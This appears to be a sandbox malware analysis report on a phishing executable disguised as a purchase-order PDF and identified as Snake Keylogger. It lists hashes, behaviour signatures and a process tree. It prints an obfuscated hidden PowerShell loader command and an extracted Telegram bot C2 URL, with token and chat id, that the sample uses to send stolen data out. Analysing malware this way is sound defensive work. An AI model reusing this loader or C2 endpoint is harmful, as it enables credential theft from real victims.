Overview

overview

10

Static

static

1

PO#7372732...DF.exe

windows7-x64

8

PO#7372732...DF.exe

windows10-2004-x64

10

Clinopinac...ck.ps1

windows7-x64

3

Clinopinac...ck.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    94s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2024 14:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO#7372732993039398372372973928392832973PDF.exe

  • Size

    802KB

  • MD5

    1894ec28b39f16b101d1e6c87b86e485

  • SHA1

    b500406168d64fa7d732249c1110f3fc29c17837

  • SHA256

    74a179d75552a0768d8857d11e5e2c2481e416735291ac98332a504cdb60ba35

  • SHA512

    005389271912b29cc8f7ccab93123ae1a7d7ed2341e520f0d2e0d4054ac2119735eae40ed7891796b55d0e150ac6f06b232119975cded446ee50bad6d398042b

  • SSDEEP

    24576:gMwhYSztYf+EDrseJDWIrxdJJ+Zx0PARxFWfcFqal/F4X5ZikM:gMwhNzKfNnsNiH3+Zq+WfQiX54

Score
10/10
snakekeyloggerdiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot8040460346:AAFN58T9Y0-aqdzScEiebBO06S141L8RsSA/sendMessage?chat_id=6680692809

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
    snakekeylogger
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PO#7372732993039398372372973928392832973PDF.exe
    "C:\Users\Admin\AppData\Local\Temp\PO#7372732993039398372372973928392832973PDF.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Beefsteak=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\haandbog\Clinopinacoidal\Upchuck.Sli';$Confluent140=$Beefsteak.SubString(55503,3);.$Confluent140($Beefsteak)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5028
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:3956
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 1528
          4⤵
          • Program crash
          PID:3332
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3956 -ip 3956
    1⤵
      PID:2012

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4uupvkr.gad.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\haandbog\Clinopinacoidal\Upchuck.Sli
      Filesize

      54KB

      MD5

      282abf9b52e4ae72cead97089f079dad

      SHA1

      b3273b1372e49947e159b541ff829e7206e95650

      SHA256

      1f16b8c905f2d8f6fe3e3b6f08a8a18259d81cc7f918a7a61bb8f2954a704a20

      SHA512

      54ef11fc44dff9bf94d324b428c70b6e895b15300303b226c029cee86b8f1dc27bcdc8751c86d5250364c30384cafb85c145dee32337c6b992a55b72e2e5bf2b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\haandbog\Sgangens.Mid
      Filesize

      362KB

      MD5

      b1ae50611cbd77f46b600fe0139c4d28

      SHA1

      13e0a58d5dc71791f9d2860c86270dbcd6696b00

      SHA256

      7132e909c8ba231e8cae79f5e6240f8c3efdcd5ab91fb53bbca221de11fe5b83

      SHA512

      8e19fbbd80ed55fd31a1ff68d1324b92ad6fde8654eb1b43231e503e874207b06395ee379a97cf84e22df91faf3342d4ca743771ac4dd8cccec69e8de8189df7

      Download Submit

    • C:\Users\Admin\AppData\Local\orts.lnk
      Filesize

      1KB

      MD5

      eb15417d1086d52f880fbba82aad7bb3

      SHA1

      89cf69b911f98f6444cb115e41c4ec334cca6492

      SHA256

      e7d37daba3c827b169a8c4825582da95aa4ed863a6b1d4e0536612bec118aea2

      SHA512

      98c2d74c36f04a3524be8ec3d82033310e60610ee56e4456d961b4a549e3101bc6b62df03e9da76464fe6d3b65e2bba7adb62b5c0b9f6c4b8fe333a854ac947f

      Download Submit

    • memory/3956-208-0x0000000001200000-0x0000000002454000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/5028-176-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-188-0x0000000007170000-0x0000000007213000-memory.dmp

      Filesize

      652KB

      Download

    • memory/5028-155-0x0000000005480000-0x00000000054E6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5028-154-0x0000000005410000-0x0000000005476000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5028-152-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-165-0x00000000056B0000-0x0000000005A04000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5028-166-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5028-167-0x0000000005CF0000-0x0000000005D3C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/5028-168-0x0000000006230000-0x00000000062C6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/5028-169-0x00000000061E0000-0x00000000061FA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5028-170-0x0000000006C90000-0x0000000006CB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5028-171-0x0000000007520000-0x0000000007AC4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/5028-151-0x0000000004DE0000-0x0000000005408000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/5028-173-0x0000000008150000-0x00000000087CA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/5028-174-0x0000000007100000-0x0000000007132000-memory.dmp

      Filesize

      200KB

      Download

    • memory/5028-150-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-175-0x000000006FB60000-0x000000006FBAC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/5028-187-0x0000000007140000-0x000000000715E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5028-177-0x00000000702A0000-0x00000000705F4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5028-153-0x0000000004D00000-0x0000000004D22000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5028-189-0x0000000007270000-0x000000000727A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/5028-190-0x00000000073F0000-0x000000000741A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/5028-192-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-191-0x0000000007420000-0x0000000007444000-memory.dmp

      Filesize

      144KB

      Download

    • memory/5028-193-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-194-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-197-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-196-0x00000000736DE000-0x00000000736DF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/5028-198-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-149-0x00000000026F0000-0x0000000002726000-memory.dmp

      Filesize

      216KB

      Download

    • memory/5028-200-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-201-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-202-0x00000000087D0000-0x000000000E387000-memory.dmp

      Filesize

      91.7MB

      Download

    • memory/5028-203-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-204-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-205-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-207-0x00000000736D0000-0x0000000073E80000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/5028-148-0x00000000736DE000-0x00000000736DF000-memory.dmp

      Filesize

      4KB

      Download